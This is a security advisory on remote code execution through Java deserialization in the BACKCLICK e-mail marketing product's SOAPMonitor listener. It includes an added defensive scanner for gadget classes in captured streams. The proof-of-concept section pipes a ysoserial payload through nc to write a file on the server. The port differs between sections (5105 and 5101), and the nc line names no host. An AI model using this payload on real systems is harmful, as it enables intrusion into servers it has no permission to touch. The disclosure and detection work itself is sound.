-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2022-033
Product: BACKCLICK
Manufacturer: BACKCLICK GmbH
Tested Version(s): BACKCLICK Professional 5.9.63 (On-Premises)
Vulnerability Type: CWE-502: Deserialization of Untrusted Data
Risk Level: High
Solution Status: Unknown
Manufacturer Notification: 2022-05-25
Public Disclosure: 2022-11-14
CVE Reference: N/A
Author of Advisory: Moritz Bechler, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

BACKCLICK is a web application used for e-mail marketing and the
creation of newsletters.

The German manufacturer describes the product as follows (see [1]):

"BACKCLICK is a web-based enterprise e-mail marketing solution and
newsletter software with which you can create online e-mail campaigns
and newsletters and send them to your customers."

Because an active third-party diagnostic component performs unsafe
deserialization, arbitrary code or system commands can be executed.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The Apache Axis diagnostic SOAPMonitor service is active and listening
on TCP port 5105. That service is documented [4] to be insecure and
accepts untrusted Java serialized input over the network.

Java serialization is known to be susceptible to deserialization
attacks, in which the existing behavior of classes on the classpath is
exploited via crafted object graphs to achieve malicious effects, e.g.
executing arbitrary code on the target system.

At least one known exploitable library is present in the application.
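The following Python scanner is an added example for this advisory; it is not code from SySS, from the BACKCLICK product or from Apache Axis. It shows how a defender can triage bytes captured on a listener like the SOAPMonitor port: it checks for the Java serialization stream header, pulls class names out of TC_CLASSDESC records and flags classes from packages that carry publicly known gadget chains. The watchlist of package prefixes and the sample streams are constructed for the example; the byte layout of the constructed class descriptors follows the Java Object Serialization Stream Protocol, but the scanner is a heuristic, not a full parser.

```python
"""Heuristic triage of a captured Java serialization stream (added example)."""
import re
import struct

STREAM_MAGIC = b"\xac\xed"      # java.io.ObjectStreamConstants.STREAM_MAGIC
STREAM_VERSION = b"\x00\x05"    # STREAM_VERSION
TC_OBJECT = 0x73
TC_CLASSDESC = 0x72
TC_ENDBLOCKDATA = 0x78
TC_NULL = 0x70

# Shape of a class name inside a class descriptor: dotted identifiers,
# optionally an array descriptor such as "[Ljava.lang.Object;".
CLASS_NAME_RE = re.compile(r"^\[*L?[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*;?$")

# Constructed watchlist (assumption): package prefixes of libraries with
# publicly known gadget chains. The advisory names commons-beanutils;
# extend the list to match what is actually on the application's classpath.
SUSPICIOUS_PREFIXES = (
    "org.apache.commons.beanutils.",
    "org.apache.commons.collections.",
    "org.apache.commons.collections4.",
)


def is_java_serialized(data: bytes) -> bool:
    """True if the bytes start with the Java serialization stream header."""
    return data.startswith(STREAM_MAGIC + STREAM_VERSION)


def extract_class_names(data: bytes) -> list[str]:
    """Collect class names from TC_CLASSDESC records.

    A record is the tag byte 0x72, a big-endian 2-byte length and the
    class name. Since 0x72 ('r') also occurs inside ordinary data, a
    candidate is accepted only if the length is plausible and the bytes
    form a well-formed class name.
    """
    names = []
    i = 0
    while i < len(data) - 3:
        if data[i] == TC_CLASSDESC:
            (length,) = struct.unpack(">H", data[i + 1:i + 3])
            raw = data[i + 3:i + 3 + length]
            if 1 <= length <= 512 and len(raw) == length:
                try:
                    name = raw.decode("ascii")  # gadget class names are ASCII
                except UnicodeDecodeError:
                    name = ""
                if CLASS_NAME_RE.match(name):
                    names.append(name)
                    i += 3 + length
                    continue
        i += 1
    return names


def assess(data: bytes) -> dict:
    """Summarise one captured message: header present, classes seen, flagged."""
    classes = extract_class_names(data)
    flagged = [c for c in classes if c.startswith(SUSPICIOUS_PREFIXES)]
    return {"serialized": is_java_serialized(data),
            "classes": classes,
            "flagged": flagged}


def _class_desc(name: str) -> bytes:
    """Build a minimal TC_CLASSDESC record for a constructed sample stream."""
    encoded = name.encode("ascii")
    return (bytes([TC_CLASSDESC]) + struct.pack(">H", len(encoded)) + encoded
            + b"\x00" * 8                         # serialVersionUID (constructed)
            + b"\x02"                             # SC_SERIALIZABLE
            + b"\x00\x00"                         # no fields described
            + bytes([TC_ENDBLOCKDATA, TC_NULL]))  # no annotations, no superclass


# Constructed sample: skeleton of a stream wrapping a commons-beanutils
# comparator in a java.util.PriorityQueue. Only the class descriptors are
# realistic; object field data is deliberately omitted.
SAMPLE_GADGET_STREAM = (
    STREAM_MAGIC + STREAM_VERSION
    + bytes([TC_OBJECT]) + _class_desc("java.util.PriorityQueue")
    + bytes([TC_OBJECT]) + _class_desc("org.apache.commons.beanutils.BeanComparator")
)

# Constructed sample of ordinary SOAP traffic for comparison.
SAMPLE_SOAP = b'<?xml version="1.0"?><soapenv:Envelope/>'


if __name__ == "__main__":
    for label, sample in (("gadget stream", SAMPLE_GADGET_STREAM), ("soap", SAMPLE_SOAP)):
        print(label, assess(sample))
```

A hit on the stream header alone is already a strong signal on a port that is supposed to carry SOAP monitoring traffic; the class list then tells the responder which library the object graph leans on. On the JVM side, serialization filters (JEP 290, the `jdk.serialFilter` system property, available since Java 9 and backported to 8u121) can reject such classes before any object is instantiated, independent of a vendor fix, provided the allowed classes of the application are known.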
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

A payload targeting the commons-beanutils library can be generated with
ysoserial [5] and submitted to the SOAPMonitor network listener:

- -----
> java -jar target/ysoserial-0.0.5-SNAPSHOT-all.jar \
    CommonsBeanutils1 touch /var/lib/tomcat9/webapps/bc/pwned.jsp | \
    nc 5101
- -----

The created file can be observed on the server:

- ----
> ls -la /var/lib/tomcat9/webapps/bc/pwned.jsp
- -rw-r----- 1 tomcat tomcat 0 Mär 14 11:19 pwned.jsp
- ----

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Contact vendor for solution.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2022-05-25: Vulnerabilities reported to manufacturer
2022-06-28: Advisories provided again, as originals were not received
2022-07-20: Confirmation, inquiry regarding reproduction of one issue
2022-11-14: No more information received, public disclosure of
            vulnerabilities

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for BACKCLICK
    https://www.backclick.de/
[2] SySS Security Advisory SYSS-2022-033
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-033.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy
[4] Apache Axis SOAPMonitor Documentation
    https://axis.apache.org/axis2/java/core/docs/soapmonitor-module.html
[5] ysoserial
    https://github.com/frohoff/ysoserial/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Bechler of SySS GmbH.
E-Mail: moritz.bechler@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Bechler.asc
Key ID: 0x768EFE2BB3E53DDA
Key Fingerprint: 2C8F F101 9D77 BDE6 465E CCC2 768E FE2B B3E5 3DDA

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQEzBAEBCgAdFiEELI/xAZ13veZGXszCdo7+K7PlPdoFAmNkyT8ACgkQdo7+K7Pl
PdoS/AgArzcaDq8VARfXPlKpUb0VPdxEqVJKOjvx9NXyXF394lTd3yengn1U3vrU
IAYq2/RylfIqWBAC4ItI/alFklAchzzqDd5fzjGdNisw4GCwlwvMC6c5nej6GdaL
iHXYzTXlXvxDgjowkpZ3IHT5gyqXoAnYhv4vxcEN4ypLFV4F/eWiMUIrP81UjCZB
jfkyJw+DhhWE/BQoZ8henCJXch+O/BUHAQJPzJJo43Yb0Vg/HOXtwc4C0vL7da/+
Ghi5Bz8QaySw6j3dCn3J2arUL8yQpJwtuVLpDkJ5m3vwmzISIN8fjfHPz30/tgPy
UkMIiDp++fhVLdBlbNRZFqg+Y4Lhhw==
=KszS
-----END PGP SIGNATURE-----